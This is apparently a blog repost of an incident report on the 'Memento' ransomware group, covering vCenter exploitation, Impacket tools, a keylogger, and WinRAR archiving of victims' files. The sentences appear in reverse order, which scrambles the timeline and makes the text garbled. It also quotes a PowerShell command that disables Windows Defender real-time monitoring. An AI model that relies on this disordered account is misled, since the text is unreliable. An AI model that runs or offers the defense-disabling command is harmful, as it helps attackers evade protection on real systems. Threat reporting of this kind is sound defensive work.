Next, the intruders started using PowerShell web requests to pull down files: first, a copy of a command-line version of the WinRAR utility, and then a pair of RAR archives on the compromised server. Six days later, they came back and began further setting up shop, first using a PowerShell command to attempt to turn off malware scanning: powershell Set-MpPreference -DisableRealtimeMonitoring $true The hash dump tool was likely used to acquire credentials for accounts that would be used later. While there are hints of the actors behind this attack gaining access to the targeted network as early as mid-April, the first real signs of intrusion were on May 4: the dropping of PyInstaller-compiled versions of two tools from the Impacket toolset-the wmiexec remote shell tool (which executes commands via Windows Management Instrumentation) and the secretsdump hash dumping tool were dropped onto a Windows server. This server had outdated malware protection and was not configured with endpoint detection and response. The vulnerability allowed anyone who had TCP/IP port 443 access to the server to execute commands remotely with system-level privileges a firewall had been misconfigured, and the vCenter Server was exposed to the Internet on that port. The ransomware actors appear to have taken advantage of a flaw in VMware’s vCenter Server web client first revealed in February. The Memento actors also waited a long time before executing their attack-so long that at least two different cryptocurrency miners were dropped onto the server they used for initial access during the course of their dwell time by different intruders using similar exploits. The attackers also deployed an open-source Python-based keylogger on several machines as they moved laterally within the network using Remote Desktop Protocol. And in a ransom note that largely cribs the format used by REvil (including the “ What’s Happen ” introduction), the criminals behind the ransomware instructed the victims to contact them via a Telegram account. The ransomware itself is a Python 3.9 script compiled with PyInstaller. There were some other twists to the “Memento” attack as well. They then demanded $1 million US to restore the files, and threatened data exposure if the victim did not comply. After failing on the first attempt, they changed tactics, and re-deployed, as evidenced by the multiple versions of the ransomware payload compiled at different times found on the victim’s network. This was a retooling by the ransomware actors, who initially attempted to encrypt files directly-but were stopped by endpoint protection. Instead, it copies files into password-protected archives, using a renamed freeware version of the legitimate file utility WinRAR-and then encrypts the password and deletes the original files. The ransomware used by this group, who identify themselves as “Memento Team,” doesn’t encrypt files. In late October, Sophos MTR’s Rapid Response Team encountered a new ransomware group with an interesting approach to holding victims’ files hostage.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |